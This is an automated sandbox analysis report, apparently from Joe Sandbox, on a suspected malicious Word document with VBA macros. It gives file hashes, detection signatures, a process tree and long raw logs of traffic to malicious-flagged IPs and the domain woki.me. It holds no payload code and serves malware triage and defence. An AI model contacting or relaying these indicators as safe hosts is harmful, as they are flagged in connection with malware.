Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
NCR2025-000455.docx.doc

Overview

General Information

Sample name:NCR2025-000455.docx.doc
Analysis ID:1616494
MD5:bc0ab291694ec67aad2ef22cb680df22
SHA1:aa0ee7bbb4f883bfe7b6f824181609f309d83ba1
SHA256:cc46628096b1c48f36accd498026b5080b7714de6081359af69503583023eaf7
Tags:docUKRuser-smica83
Infos:
Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
AV process strings found (often used to terminate AV products)
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May use bcdedit to modify the Windows boot settings
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w11x64_office
  • WINWORD.EXE (PID: 5956 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
    • WerFault.exe (PID: 7196 cmdline: C:\Windows\system32\WerFault.exe -u -p 5956 -s 5408 MD5: 5A849C27C4796C1A7C22C572D8EAF95D)
    • WerFault.exe (PID: 7340 cmdline: C:\Windows\system32\WerFault.exe -u -p 5956 -s 5144 MD5: 5A849C27C4796C1A7C22C572D8EAF95D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 53971, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 5956, Protocol: tcp, SourceIp: 142.132.211.198, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-16T21:05:43.446574+010018100041Potentially Bad Traffic192.168.2.2453978142.132.211.198443TCP
2025-02-16T21:05:43.967600+010018100041Potentially Bad Traffic192.168.2.245397967.217.247.19380TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-16T21:05:40.981983+010018100051Potentially Bad Traffic192.168.2.2453973142.132.211.198443TCP

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Persistence and Installation Behavior
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • Lowering of HIPS / PFW / Operating System Security Settings

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: NCR2025-000455.docx.docVirustotal: Detection: 40%Perma Link
Source: NCR2025-000455.docx.docReversingLabs: Detection: 35%
Source: unknownHTTPS traffic detected: 142.132.211.198:443 -> 192.168.2.24:53971 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.22.242.9:443 -> 192.168.2.24:53985 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\WerFault.exe
Source: global trafficDNS query: name: woki.me
Source: global trafficDNS query: name: 198.187.3.20.in-addr.arpa
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
